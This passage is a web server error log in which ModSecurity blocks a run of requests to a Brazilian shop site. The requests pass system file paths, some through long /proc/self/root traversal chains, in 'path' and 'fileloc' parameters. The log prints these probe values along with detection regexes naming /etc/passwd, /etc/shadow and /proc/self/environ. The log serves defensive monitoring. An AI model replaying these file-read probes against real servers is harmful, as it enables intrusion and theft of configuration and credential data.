"/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02SQF0L0L-SsrnPo50DwAAAsU"]
[Fri Mar 20 08:58:01.477981 2026] [:error] [pid 11642:tid 140411632822016] [client 57.141.18.54:60358] [client 57.141.18.54] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dnsmasq.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02Sbninkcc-iUj5AppIAAAA40"]
[Fri Mar 20 08:58:02.150707 2026] [:error] [pid 15826:tid 140411574073088] [client 57.141.18.100:60458] [client 57.141.18.100] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02SuoXxyEfFpUF8f-LwQAAAVQ"]
[Fri Mar 20 08:58:03.569424 2026] [:error] [pid 7235:tid 140411641214720] [client 57.141.18.27:60630] [client 57.141.18.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02S_qxLDW4GITHUkT0pQAAAQw"]
[Fri Mar 20 08:58:04.095859 2026] [mime_magic:error] [pid 10189:tid 140411540502272] (70014)End of file found: [client 216.73.216.191:60662] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 08:58:05.945783 2026] [mime_magic:error] [pid 10189:tid 140411590858496] (70014)End of file found: [client 216.73.216.191:60804] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 08:58:42.676335 2026] [:error] [pid 7235:tid 140411674785536] [client 74.7.243.128:38632] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab02cvqxLDW4GITHUkT0yQAAAQg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:58:43.986689 2026] [:error] [pid 11167:tid 140411624429312] [client 74.7.243.128:49454] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sestatus.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab02c_HIg5MgXLBnicMCSQAAAc4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:58:51.840453 2026] [:error] [pid 7235:tid 140411699963648] [client 74.7.243.128:49462] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab02e_qxLDW4GITHUkT00QAAAQU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:58:55.127472 2026] [:error] [pid 21219:tid 140411741927168] [client 57.141.18.97:34420] [client 57.141.18.97] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02f_XLqtnMIWvjpaKl_gAAAoA"]
[Fri Mar 20 08:58:55.343436 2026] [:error] [pid 21219:tid 140411616036608] [client 74.7.243.128:35422] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab02f_XLqtnMIWvjpaKl_wAAAo8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:58:55.447674 2026] [:error] [pid 7893:tid 140411658000128] [client 57.141.18.25:34372] [client 57.141.18.25] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/vimrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02fxCii7xarUs8iHZy0AAAAgo"]
[Fri Mar 20 08:58:56.223054 2026] [:error] [pid 15826:tid 140411565680384] [client 57.141.18.20:34444] [client 57.141.18.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rsyncd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02gOoXxyEfFpUF8f-L3AAAAVU"]
[Fri Mar 20 08:58:57.651005 2026] [:error] [pid 26799:tid 140411699963648] [client 57.141.18.19:34438] [client 57.141.18.19] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/libaudit.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02gda6ubjKNq_cu4bhkQAAA0U"]
[Fri Mar 20 08:58:57.723243 2026] [:error] [pid 7893:tid 140411624429312] [client 74.7.243.128:35426] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab02gRCii7xarUs8iHZy1AAAAg4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:58:58.177691 2026] [:error] [pid 11642:tid 140411540502272] [client 57.141.18.28:34494] [client 57.141.18.28] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/krb5.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02grninkcc-iUj5AppaAAAA5g"]
[Fri Mar 20 08:58:58.611888 2026] [:error] [pid 21219:tid 140411674785536] [client 57.141.18.18:34500] [client 57.141.18.18] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/exports"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02gvXLqtnMIWvjpaKmAAAAAog"]
[Fri Mar 20 08:58:58.675618 2026] [:error] [pid 11642:tid 140411649607424] [client 57.141.18.28:34504] [client 57.141.18.28] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/crontab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02grninkcc-iUj5AppaQAAA4s"]
[Fri Mar 20 08:58:59.143790 2026] [:error] [pid 7235:tid 140411599251200] [client 57.141.18.110:34516] [client 57.141.18.110] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/chrony.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02g_qxLDW4GITHUkT01wAAARE"]
[Fri Mar 20 08:58:59.740005 2026] [:error] [pid 26799:tid 140411582465792] [client 57.141.18.64:34536] [client 57.141.18.64] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ntp.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02g9a6ubjKNq_cu4bhlQAAA1M"]
[Fri Mar 20 08:59:00.358821 2026] [:error] [pid 11642:tid 140411699963648] [client 57.141.18.65:34520] [client 57.141.18.65] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02hLninkcc-iUj5AppawAAA4U"]
[Fri Mar 20 08:59:00.423882 2026] [:error] [pid 7235:tid 140411616036608] [client 57.141.18.32:34550] [client 57.141.18.32] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/my.cnf.old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02hPqxLDW4GITHUkT02QAAAQ8"]
[Fri Mar 20 08:59:01.001401 2026] [:error] [pid 7893:tid 140411649607424] [client 57.141.18.65:34562] [client 57.141.18.65] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02hBCii7xarUs8iHZy2AAAAgs"]
[Fri Mar 20 08:59:01.061181 2026] [:error] [pid 7893:tid 140411565680384] [client 57.141.18.75:34564] [client 57.141.18.75] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mime.types"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02hRCii7xarUs8iHZy2QAAAhU"]
[Fri Mar 20 08:59:01.168735 2026] [:error] [pid 7235:tid 140411674785536] [client 74.7.243.128:35442] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab02hfqxLDW4GITHUkT02wAAAQg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:59:01.789802 2026] [:error] [pid 15826:tid 140411725141760] [client 57.141.18.116:34584] [client 57.141.18.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02heoXxyEfFpUF8f-L3QAAAUI"]
[Fri Mar 20 08:59:01.810997 2026] [:error] [pid 15826:tid 140411599251200] [client 57.141.18.98:34586] [client 57.141.18.98] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/yum.conf.bkp-21-10-22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02heoXxyEfFpUF8f-L3gAAAVE"]
[Fri Mar 20 08:59:02.440421 2026] [:error] [pid 31215:tid 140411574073088] [client 57.141.18.61:34592] [client 57.141.18.61] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02hgF0L0L-SsrnPo50NgAAAtQ"]
[Fri Mar 20 08:59:02.652658 2026] [:error] [pid 9818:tid 140411599251200] [client 74.7.243.128:60564] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab02hl1pVZ5mVmJwsFM9CAAAAFE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
